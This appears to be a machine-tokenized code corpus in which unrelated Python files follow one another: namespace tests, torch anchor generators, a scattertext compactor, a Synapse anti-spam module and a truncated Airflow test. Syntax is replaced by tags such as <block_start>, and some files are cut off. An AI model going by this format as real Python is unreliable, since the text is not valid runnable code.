expected_database="database" expected_suffixes=["transformer"])<block_end><def_stmt>test_guarantees_environment self<block_start>name="env.cluster.database"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_environment="env") expected_name=name expected_environment="env" expected_cluster="cluster" expected_database="database")<block_end><def_stmt>test_fail_impossible self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_environment="main")<block_end><def_stmt>test_fail_impossible_suffixes self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_suffixes=["heartbeat"])<block_end><def_stmt>test_fail_impossible_double_cluster_env self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_environment="dev" expected_cluster="dev")<block_end><def_stmt>test_fail_impossible_env_db self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_environment="dev" expected_database="refresh_primary")<block_end><def_stmt>test_no_name self<block_start>self._assert_success(actual_namespace=DBSourcedNamespace(environment="main" cluster="refresh_primary" database="yelp") expected_name="main.refresh_primary.yelp" expected_environment="main" expected_cluster="refresh_primary" expected_database="yelp")<block_end><def_stmt>test_no_name_no_env self<block_start>self._assert_success(actual_namespace=DBSourcedNamespace(cluster="refresh_primary" database="yelp" suffixes=["heartbeat"]) expected_name="refresh_primary.yelp.heartbeat" expected_cluster="refresh_primary" expected_database="yelp" expected_suffixes=["heartbeat"])<block_end><def_stmt>_assert_failure self name error_substr<block_start><with_stmt>pytest.raises(ValueError)<as>e<block_start>DBSourcedNamespace.create_from_namespace_name(name)<assert_stmt>error_substr<in>e<block_end><block_end><def_stmt>_assert_failure_with_guarantees self name expected_cluster=<none> expected_database=<none> expected_environment=<none> expected_suffixes=<none><block_start><with_stmt>pytest.raises(ValueError)<as>e<block_start>DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_environment=expected_environment expected_cluster=expected_cluster expected_database=expected_database expected_suffixes=expected_suffixes)<assert_stmt>"impossible to rectify"<in>e<block_end><block_end><def_stmt>_assert_success self actual_namespace expected_name expected_cluster expected_database expected_environment=<none> expected_suffixes=<none><block_start><if_stmt><not>expected_suffixes<block_start>expected_suffixes=[]<block_end><assert_stmt>actual_namespace.get_name()<eq>expected_name<assert_stmt>actual_namespace.cluster<eq>expected_cluster<assert_stmt>actual_namespace.database<eq>expected_database<assert_stmt>actual_namespace.environment<eq>expected_environment<assert_stmt>actual_namespace.suffixes<eq>expected_suffixes<block_end><block_end>
<import_stmt>logging<import_stmt>arcade<def_stmt>test_logging <block_start>arcade.configure_logging(logging.WARNING)<line_sep>logger=logging.getLogger('arcade')<assert_stmt>logger.level<eq>logging.WARNING<block_end>
""" Parts of this code are from torchvision and thus licensed under BSD 3-Clause License Copyright (c) <NAME> 2016, All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """<import_stmt>torch<import_from_stmt>typing Callable Sequence List Tuple TypeVar Union<import_from_stmt>torchvision.models.detection.rpn AnchorGenerator<import_from_stmt>loguru logger<import_from_stmt>itertools product<line_sep>AnchorGeneratorType=TypeVar('AnchorGeneratorType' bound=AnchorGenerator)<def_stmt>get_anchor_generator dim:int s_param:bool=<false><arrow>AnchorGenerator<block_start>""" Get anchor generator class for corresponding dimension Args: dim: number of spatial dimensions s_param: enable size parametrization Returns: Callable: class of anchor generator """<line_sep>normal={2:AnchorGenerator2D 3:AnchorGenerator3D}<line_sep>sparam={2:AnchorGenerator2DS 3:AnchorGenerator3DS}<if_stmt>s_param<block_start><return>sparam[dim]<block_end><else_stmt><block_start><return>normal[dim]<block_end><block_end><def_stmt>compute_anchors_for_strides anchors:torch.Tensor strides:Sequence[Union[Sequence[Union[int float]] Union[int float]]] cat:bool<arrow>Union[List[torch.Tensor] torch.Tensor]<block_start>""" Compute anchors sizes which follow a given sequence of strides Args: anchors: anchors for stride 0 strides: sequence of strides to adjust anchors for cat: concatenate resulting anchors, if false a Sequence of Anchors is returned Returns: Union[List[torch.Tensor], torch.Tensor]: new anchors """<line_sep>anchors_with_stride=[anchors]<line_sep>dim=anchors.shape[1]<floordiv>2<for_stmt>stride strides<block_start><if_stmt>isinstance(stride (int float))<block_start>stride=[stride]<times>dim<block_end>stride_formatted=[stride[0] stride[1] stride[0] stride[1]]<if_stmt>dim<eq>3<block_start>stride_formatted.extend([stride[2] stride[2]])<block_end>anchors_with_stride.append(anchors<times>torch.tensor(stride_formatted)[<none>].float())<block_end><if_stmt>cat<block_start>anchors_with_stride=torch.cat(anchors_with_stride dim=0)<block_end><return>anchors_with_stride<block_end><class_stmt>AnchorGenerator2D(torch.nn.Module)<block_start><def_stmt>__init__ self 
sizes:Sequence[Union[int Sequence[int]]]=(128 256 512) aspect_ratios:Sequence[Union[float Sequence[float]]]=(0.5 1.0 2.0) **kwargs<block_start>""" Generator for anchors Modified from https://github.com/pytorch/vision/blob/master/torchvision/models/detection/rpn.py Args: sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map (length should match the number of feature maps) aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios: height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have the same length as sizes """<line_sep>super().__init__()<if_stmt><not>isinstance(sizes[0] (list tuple))<block_start>sizes=tuple((s )<for>s sizes)<block_end><if_stmt><not>isinstance(aspect_ratios[0] (list tuple))<block_start>aspect_ratios=(aspect_ratios )<times>len(sizes)<block_end><assert_stmt>len(sizes)<eq>len(aspect_ratios)<line_sep>self.sizes=sizes<line_sep>self.aspect_ratios=aspect_ratios<line_sep>self.cell_anchors=<none><line_sep>self._cache={}<line_sep>self.num_anchors_per_level:List[int]=<none><if_stmt>kwargs<block_start>logger.info(f"Discarding anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>cached_grid_anchors self grid_sizes:List[List[int]] strides:List[List[int]]<arrow>List[torch.Tensor]<block_start>""" Check if combination was already generated before and return that if possible Args: grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps strides (Sequence[Sequence[int]]): stride of each feature map Returns: List[torch.Tensor]: Anchors for each feature maps """<line_sep>key=str(grid_sizes+strides)<if_stmt>key<not><in>self._cache<block_start>self._cache[key]=self.grid_anchors(grid_sizes strides)<block_end>self.num_anchors_per_level=self._cache[key][1]<line_sep><return>self._cache[key][0]<block_end><def_stmt>grid_anchors self grid_sizes strides<arrow>Tuple[List[torch.Tensor] List[int]]<block_start>""" Distribute anchors over feature maps Args: grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps strides (Sequence[Sequence[int]]): stride of each feature map Returns: List[torch.Tensor]: Anchors for each feature maps List[int]: number of anchors per level """<assert_stmt>len(grid_sizes)<eq>len(strides) "Every fm size needs strides"<assert_stmt>len(grid_sizes)<eq>len(self.cell_anchors) "Every fm size needs cell anchors"<line_sep>anchors=[]<line_sep>cell_anchors=self.cell_anchors<assert_stmt>cell_anchors<is><not><none><line_sep>_i=0<line_sep># modified from torchvision (ordering of axis differs) anchor_per_level=[]<for_stmt>size,stride,base_anchors zip(grid_sizes strides cell_anchors)<block_start>size0,size1=size<line_sep>stride0,stride1=stride<line_sep>device=base_anchors.device<line_sep>shifts_x=torch.arange(0 size0 dtype=torch.float device=device)<times>stride0<line_sep>shifts_y=torch.arange(0 size1 dtype=torch.float device=device)<times>stride1<line_sep>shift_y,shift_x=torch.meshgrid(shifts_y shifts_x)<line_sep>shift_x=shift_x.reshape(-1)<line_sep>shift_y=shift_y.reshape(-1)<line_sep>shifts=torch.stack((shift_x shift_y shift_x shift_y) dim=1)<line_sep>_anchors=(shifts.view(-1 1 4)+base_anchors.view(1 -1 4)).reshape(-1 4)<line_sep>anchors.append(_anchors)<line_sep>anchor_per_level.append(_anchors.shape[0])<line_sep>logger.debug(f"Generated {anchors[_i].shape[0]} anchors and expected "<concat>f"{size0<times>size1<times>self.num_anchors_per_location()[_i]} "<concat>f"anchors on level {_i}.")<line_sep>_i<augadd>1<block_end><return>anchors 
anchor_per_level<block_end>@staticmethod<def_stmt>generate_anchors scales:Tuple[int] aspect_ratios:Tuple[float] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu" <arrow>torch.Tensor<block_start>""" Generate anchors for a pair of scales and ratios Args: scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128) aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. (0.5, 1, 2) dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: Tensor: anchors of shape [n(scales) * n(ratios), dim * 2] """<line_sep>scales=torch.as_tensor(scales dtype=dtype device=device)<line_sep>aspect_ratios=torch.as_tensor(aspect_ratios dtype=dtype device=device)<line_sep>h_ratios=torch.sqrt(aspect_ratios)<line_sep>w_ratios=1/h_ratios<line_sep>ws=(w_ratios[: <none>]<times>scales[<none> :]).view(-1)<line_sep>hs=(h_ratios[: <none>]<times>scales[<none> :]).view(-1)<line_sep>base_anchors=torch.stack([-ws -hs ws hs] dim=1)/2<line_sep><return>base_anchors.round()<block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Set :para:`self.cell_anchors` if it was not already set Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None result is saved into attribute """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(sizes aspect_ratios dtype device)<for>sizes,aspect_ratios zip(self.sizes self.aspect_ratios)]<line_sep>self.cell_anchors=cell_anchors<block_end><def_stmt>forward self image_list:torch.Tensor feature_maps:List[torch.Tensor]<arrow>List[torch.Tensor]<block_start>""" Generate anchors for given feature maps # TODO: update docstring and type Args: image_list (torch.Tensor): data structure which contains images and their original shapes feature_maps (Sequence[torch.Tensor]): feature maps for which anchors need to be generated Returns: List[Tensor]: list of anchors (for each image inside the batch) """<line_sep>device=image_list.device<line_sep>grid_sizes=list([feature_map.shape[2:]<for>feature_map feature_maps])<line_sep>image_size=image_list.shape[2:]<line_sep>strides=[list((int(i/s)<for>i,s zip(image_size fm_size)))<for>fm_size grid_sizes]<line_sep>self.set_cell_anchors(dtype=feature_maps[0].dtype device=feature_maps[0].device)<line_sep>anchors_over_all_feature_maps=self.cached_grid_anchors(grid_sizes strides)<line_sep>anchors=[]<line_sep>images_shapes=[img.shape<for>img image_list.split(1)]<for_stmt>i,x enumerate(images_shapes)<block_start>anchors_in_image=[]<for_stmt>anchors_per_feature_map anchors_over_all_feature_maps<block_start>anchors_in_image.append(anchors_per_feature_map)<block_end>anchors.append(anchors_in_image)<block_end>anchors=[torch.cat(anchors_per_image).to(device)<for>anchors_per_image anchors]<line_sep># TODO: check with torchvision if this makes sense (if enabled, anchors are newly generated for each run) # # Clear the cache in case that memory leaks. 
# self._cache.clear() <return>anchors<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(s)<times>len(a)<for>s,a zip(self.sizes self.aspect_ratios)]<block_end><def_stmt>get_num_acnhors_per_level self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<if_stmt>self.num_anchors_per_level<is><none><block_start><raise>RuntimeError("Need to forward features maps before "<concat>"get_num_acnhors_per_level can be called")<block_end><return>self.num_anchors_per_level<block_end><block_end><class_stmt>AnchorGenerator3D(AnchorGenerator2D)<block_start><def_stmt>__init__ self sizes:Sequence[Union[int Sequence[int]]]=(128 256 512) aspect_ratios:Sequence[Union[float Sequence[float]]]=(0.5 1.0 2.0) zsizes:Sequence[Union[int Sequence[int]]]=(4 4 4) **kwargs<block_start>""" Helper to generate anchors for different input sizes Args: sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map (length should match the number of feature maps) aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios: height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have the same length as sizes zsizes (Sequence[Union[int, Sequence[int]]]): sizes along z dimension """<line_sep>super().__init__(sizes aspect_ratios)<if_stmt><not>isinstance(zsizes[0] (Sequence list tuple))<block_start>zsizes=(zsizes )<times>len(sizes)<block_end>self.zsizes=zsizes<if_stmt>kwargs<block_start>logger.info(f"Discarding anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Compute anchors for all pairs of sclaes and ratios and save them inside :param:`cell_anchors` if they were not computed before Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None (result is saved into :param:`self.cell_anchors`) """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(sizes aspect_ratios zsizes dtype device)<for>sizes,aspect_ratios,zsizes zip(self.sizes self.aspect_ratios self.zsizes)]<line_sep>self.cell_anchors=cell_anchors<block_end>@staticmethod<def_stmt>generate_anchors scales:Tuple[int] aspect_ratios:Tuple[float] zsizes:Tuple[int] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu"<arrow>torch.Tensor<block_start>""" Generate anchors for a pair of scales and ratios Args: scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128) aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. 
(0.5, 1, 2) zsizes (Tuple[int]): scale along z dimension dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: Tensor: anchors of shape [n(scales) * n(ratios) * n(zscales) , dim * 2] """<line_sep>base_anchors_2d=AnchorGenerator2D.generate_anchors(scales aspect_ratios dtype=dtype device=device)<line_sep>zanchors=torch.cat([torch.as_tensor([-z z] dtype=dtype device=device).repeat(base_anchors_2d.shape[0] 1)<for>z zsizes] dim=0)<line_sep>base_anchors_3d=torch.cat([base_anchors_2d.repeat(len(zsizes) 1) (zanchors/2.).round()] dim=1)<line_sep><return>base_anchors_3d<block_end><def_stmt>grid_anchors self grid_sizes:Sequence[Sequence[int]] strides:Sequence[Sequence[int]]<arrow>Tuple[List[torch.Tensor] List[int]]<block_start>""" Distribute anchors over feature maps Args: grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps strides (Sequence[Sequence[int]]): stride of each feature map Returns: List[torch.Tensor]: Anchors for each feature maps List[int]: number of anchors per level """<assert_stmt>len(grid_sizes)<eq>len(strides)<assert_stmt>len(grid_sizes)<eq>len(self.cell_anchors)<line_sep>anchors=[]<line_sep>_i=0<line_sep>anchor_per_level=[]<for_stmt>size,stride,base_anchors zip(grid_sizes strides self.cell_anchors)<block_start>size0,size1,size2=size<line_sep>stride0,stride1,stride2=stride<line_sep>dtype,device=base_anchors.dtype base_anchors.device<line_sep>shifts_x=torch.arange(0 size0 dtype=dtype device=device)<times>stride0<line_sep>shifts_y=torch.arange(0 size1 dtype=dtype device=device)<times>stride1<line_sep>shifts_z=torch.arange(0 size2 dtype=dtype device=device)<times>stride2<line_sep>shift_x,shift_y,shift_z=torch.meshgrid(shifts_x shifts_y shifts_z)<line_sep>shift_x=shift_x.reshape(-1)<line_sep>shift_y=shift_y.reshape(-1)<line_sep>shift_z=shift_z.reshape(-1)<line_sep>shifts=torch.stack((shift_x shift_y shift_x shift_y shift_z shift_z) dim=1)<line_sep>_anchors=(shifts.view(-1 1 6)+base_anchors.view(1 -1 6)).reshape(-1 6)<line_sep>anchors.append(_anchors)<line_sep>anchor_per_level.append(_anchors.shape[0])<line_sep>logger.debug(f"Generated {_anchors.shape[0]} anchors and expected "<concat>f"{size0<times>size1<times>size2<times>self.num_anchors_per_location()[_i]} "<concat>f"anchors on level {_i}.")<line_sep>_i<augadd>1<block_end><return>anchors anchor_per_level<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(s)<times>len(a)<times>len(z)<for>s,a,z zip(self.sizes self.aspect_ratios self.zsizes)]<block_end><block_end><class_stmt>AnchorGenerator2DS(AnchorGenerator2D)<block_start><def_stmt>__init__ self width:Sequence[Union[int Sequence[int]]] height:Sequence[Union[int Sequence[int]]] **kwargs <block_start>""" Helper to generate anchors for different input sizes Uses a different parametrization of anchors (if Sequence[int] is provided it is interpreted as one value per feature map size) Args: width: sizes along width dimension height: sizes along height dimension """<line_sep># TODO: check width and height statements super().__init__()<if_stmt><not>isinstance(width[0] Sequence)<block_start>width=[(w )<for>w width]<block_end><if_stmt><not>isinstance(height[0] Sequence)<block_start>height=[(h )<for>h height]<block_end>self.width=width<line_sep>self.height=height<assert_stmt>len(self.width)<eq>len(self.height)<if_stmt>kwargs<block_start>logger.info(f"Discarding 
anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Compute anchors for all pairs of sclaes and ratios and save them inside :param:`cell_anchors` if they were not computed before Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None (result is saved into :param:`self.cell_anchors`) """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(w h dtype device)<for>w,h zip(self.width self.height)]<line_sep>self.cell_anchors=cell_anchors<block_end>@staticmethod<def_stmt>generate_anchors width:Tuple[int] height:Tuple[int] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu" <arrow>torch.Tensor<block_start>""" Generate anchors for given width, height and depth sizes Args: width: sizes along width dimension height: sizes along height dimension Returns: Tensor: anchors of shape [n(width) * n(height), dim * 2] """<line_sep>all_sizes=torch.tensor(list(product(width height)) dtype=dtype device=device)/2<line_sep>anchors=torch.stack([-all_sizes[: 0] -all_sizes[: 1] all_sizes[: 0] all_sizes[: 1]] dim=1)<line_sep><return>anchors<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(w)<times>len(h)<for>w,h zip(self.width self.height)]<block_end><block_end><class_stmt>AnchorGenerator3DS(AnchorGenerator3D)<block_start><def_stmt>__init__ self width:Sequence[Union[int Sequence[int]]] height:Sequence[Union[int Sequence[int]]] depth:Sequence[Union[int Sequence[int]]] **kwargs <block_start>""" Helper to generate anchors for different input sizes Uses a different parametrization of anchors (if Sequence[int] is provided it is interpreted as one value per feature map size) Args: width: sizes along width dimension height: sizes along height dimension depth: sizes along depth dimension """<line_sep># TODO: check width and height statements super().__init__()<if_stmt><not>isinstance(width[0] Sequence)<block_start>width=[(w )<for>w width]<block_end><if_stmt><not>isinstance(height[0] Sequence)<block_start>height=[(h )<for>h height]<block_end><if_stmt><not>isinstance(depth[0] Sequence)<block_start>depth=[(d )<for>d depth]<block_end>self.width=width<line_sep>self.height=height<line_sep>self.depth=depth<assert_stmt>len(self.width)<eq>len(self.height)<eq>len(self.depth)<if_stmt>kwargs<block_start>logger.info(f"Discarding anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Compute anchors for all pairs of scales and ratios and save them inside :param:`cell_anchors` if they were not computed before Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None (result is saved into :param:`self.cell_anchors`) """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(w h d dtype device)<for>w,h,d zip(self.width self.height self.depth)]<line_sep>self.cell_anchors=cell_anchors<block_end>@staticmethod<def_stmt>generate_anchors width:Tuple[int] height:Tuple[int] depth:Tuple[int] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu"<arrow>torch.Tensor<block_start>""" Generate anchors 
for given width, height and depth sizes Args: width: sizes along width dimension height: sizes along height dimension depth: sizes along depth dimension Returns: Tensor: anchors of shape [n(width) * n(height) * n(depth) , dim * 2] """<line_sep>all_sizes=torch.tensor(list(product(width height depth)) dtype=dtype device=device)/2<line_sep>anchors=torch.stack([-all_sizes[: 0] -all_sizes[: 1] all_sizes[: 0] all_sizes[: 1] -all_sizes[: 2] all_sizes[: 2]] dim=1)<line_sep><return>anchors<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(w)<times>len(h)<times>len(d)<for>w,h,d zip(self.width self.height self.depth)]<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>scattertext.termranking AbsoluteFrequencyRanker<class_stmt>ClassPercentageCompactor(object)<block_start><def_stmt>__init__ self term_ranker=AbsoluteFrequencyRanker term_count=2<block_start>''' Limit terms to ones that make up a minimum percentage of documents in a category. Given a term_count, set the threshold to that of the smallest class. Parameters ---------- term_ranker : TermRanker term_count : int '''<line_sep>self.term_ranker=term_ranker<line_sep>self.term_count=term_count<block_end><def_stmt>compact self term_doc_matrix non_text=<false><block_start>''' Parameters ---------- term_doc_matrix : TermDocMatrix non_text : bool Returns ------- New term doc matrix '''<line_sep>ranker=self.term_ranker(term_doc_matrix)<if_stmt>non_text<block_start>ranker=ranker.use_non_text_features()<block_end>tdf=ranker.get_ranks()<line_sep>tdf_sum=tdf.sum(axis=0)<line_sep>tdf_portions=tdf/tdf_sum<line_sep>threshold=np.max(self.term_count/tdf_sum)<line_sep>terms_to_remove=tdf_portions[~(tdf_portions<g>threshold).any(axis=1)].index<line_sep><return>term_doc_matrix.remove_terms(terms_to_remove non_text=non_text)<block_end><block_end>
# -*- coding: utf-8 -*- # Copyright 2019 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>logging<import_from_stmt>.list_rule ALL_RULE_TYPES RECOMMENDATION_BAN<import_from_stmt>.ban_list BanList<import_from_stmt>synapse.types UserID<line_sep>logger=logging.getLogger("synapse.contrib."+__name__)<class_stmt>AntiSpam(object)<block_start><def_stmt>__init__ self config api<block_start>self.block_invites=config.get("block_invites" <true>)<line_sep>self.block_messages=config.get("block_messages" <false>)<line_sep>self.block_usernames=config.get("block_usernames" <false>)<line_sep>self.list_room_ids=config.get("ban_lists" [])<line_sep>self.rooms_to_lists={}# type: Dict[str, BanList] self.api=api<line_sep># Now we build the ban lists so we can match them self.build_lists()<block_end><def_stmt>build_lists self<block_start><for_stmt>room_id self.list_room_ids<block_start>self.build_list(room_id)<block_end><block_end><def_stmt>build_list self room_id<block_start>logger.info("Rebuilding ban list for %s"%(room_id))<line_sep>self.get_list_for_room(room_id).build()<block_end><def_stmt>get_list_for_room self room_id<block_start><if_stmt>room_id<not><in>self.rooms_to_lists<block_start>self.rooms_to_lists[room_id]=BanList(api=self.api room_id=room_id)<block_end><return>self.rooms_to_lists[room_id]<block_end><def_stmt>is_user_banned self user_id<block_start><for_stmt>room_id self.rooms_to_lists<block_start>ban_list=self.rooms_to_lists[room_id]<for_stmt>rule ban_list.user_rules<block_start><if_stmt>rule.matches(user_id)<block_start><return>rule.action<eq>RECOMMENDATION_BAN<block_end><block_end><block_end><return><false><block_end><def_stmt>is_room_banned self invite_room_id<block_start><for_stmt>room_id self.rooms_to_lists<block_start>ban_list=self.rooms_to_lists[room_id]<for_stmt>rule ban_list.room_rules<block_start><if_stmt>rule.matches(invite_room_id)<block_start><return>rule.action<eq>RECOMMENDATION_BAN<block_end><block_end><block_end><return><false><block_end><def_stmt>is_server_banned self server_name<block_start><for_stmt>room_id self.rooms_to_lists<block_start>ban_list=self.rooms_to_lists[room_id]<for_stmt>rule ban_list.server_rules<block_start><if_stmt>rule.matches(server_name)<block_start><return>rule.action<eq>RECOMMENDATION_BAN<block_end><block_end><block_end><return><false><block_end># --- spam checker interface below here --- <def_stmt>check_event_for_spam self event<block_start>room_id=event.get("room_id" "")<line_sep>event_type=event.get("type" "")<line_sep>state_key=event.get("state_key" <none>)<line_sep># Rebuild the rules if there's an event for our ban lists <if_stmt>state_key<is><not><none><and>event_type<in>ALL_RULE_TYPES<and>room_id<in>self.list_room_ids<block_start>logger.info("Received ban list event - updating list")<line_sep>self.get_list_for_room(room_id).build(with_event=event)<line_sep><return><false><block_end># Ban list updates aren't spam <if_stmt><not>self.block_messages<block_start><return><false><block_end># not spam (we aren't blocking messages) 
sender=UserID.from_string(event.get("sender" ""))<if_stmt>self.is_user_banned(sender.to_string())<block_start><return><true><block_end><if_stmt>self.is_server_banned(sender.domain)<block_start><return><true><block_end><return><false><block_end># not spam (as far as we're concerned) <def_stmt>user_may_invite self inviter_user_id invitee_user_id room_id<block_start><if_stmt><not>self.block_invites<block_start><return><true><block_end># allowed (we aren't blocking invites) sender=UserID.from_string(inviter_user_id)<if_stmt>self.is_user_banned(sender.to_string())<block_start><return><false><block_end><if_stmt>self.is_room_banned(room_id)<block_start><return><false><block_end><if_stmt>self.is_server_banned(sender.domain)<block_start><return><false><block_end><return><true><block_end># allowed (as far as we're concerned) <def_stmt>check_username_for_spam self user_profile<block_start><if_stmt><not>self.block_usernames<block_start><return><true><block_end># allowed (we aren't blocking based on usernames) # Check whether the user ID or display name matches any of the banned # patterns. <return>self.is_user_banned(user_profile["user_id"])<or>self.is_user_banned(user_profile["display_name"])<block_end><def_stmt>user_may_create_room self user_id<block_start><return><true><block_end># allowed <def_stmt>user_may_create_room_alias self user_id room_alias<block_start><return><true><block_end># allowed <def_stmt>user_may_publish_room self user_id room_id<block_start><return><true><block_end># allowed @staticmethod<def_stmt>parse_config config<block_start><return>config<block_end><block_end># no parsing needed
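# Hypothetical usage sketch (the values below are placeholders, not part of the original module): the module expects a config dict with the keys read in __init__, and parse_config simply returns it unchanged. example_config={"block_invites":<true> "block_messages":<false> "block_usernames":<false> "ban_lists":["!banlistroom:example.org"]}<line_sep>print(AntiSpam.parse_config(example_config))<line_sep>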
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_stmt>logging<import_stmt>pytest<import_from_stmt>airflow.config_templates.airflow_local_settings DEFAULT_LOGGING_CONFIG<import_from_stmt>airflow.models DAG TaskInstance<import_from_stmt>airflow.operators.empty EmptyOperator<import_from_stmt>airflow.utils.log.logging_mixin set_context<import_from_stmt>airflow.utils.state DagRunState<import_from_stmt>airflow.utils.timezone datetime<import_from_stmt>airflow.utils.types DagRunType<import_from_stmt>tests.test_utils.config conf_vars<import_from_stmt>tests.test_utils.db clear_db_runs<line_sep>DEFAULT_DATE=datetime(2019 1 1)<line_sep>TASK_HANDLER='task'<line_sep>TASK_HANDLER_CLASS='airflow.utils.log.task_handler_with_custom_formatter.TaskHandlerWithCustomFormatter'<line_sep>PREV_TASK_HANDLER=DEFAULT_LOGGING_CONFIG['handlers']['task']<line_sep>DAG_ID="task_handler_with_custom_formatter_dag"<line_sep>TASK_ID="task_handler_with_custom_formatter_task"<line_sep>@pytest.fixture(scope="module" autouse=<true>)<def_stmt>custom_task_log_handler_config <block_start>DEFAULT_LOGGING_CONFIG['handlers']['task']={'class':TASK_HANDLER_CLASS 'formatter':'airflow' 'stream':'sys.stdout' }<line_sep>logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)<line_sep>logging.root.disabled=<false><line_sep><yield><line_sep>DEFAULT_LOGGING_CONFIG['handlers']['task']=PREV_TASK_HANDLER<line_sep>logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)<block_end>@pytest.fixture()<def_stmt>task_instance <block_start>dag=DAG(DAG_ID start_date=DEFAULT_DATE)<line_sep>task=EmptyOperator(task_id=TASK_ID dag=dag)<line_sep>dagrun=dag.create_dagrun(DagRunState.RUNNING execution_date=DEFAULT_DATE run_type=DagRunType.MANUAL)<line_sep>ti=TaskInstance(task=task 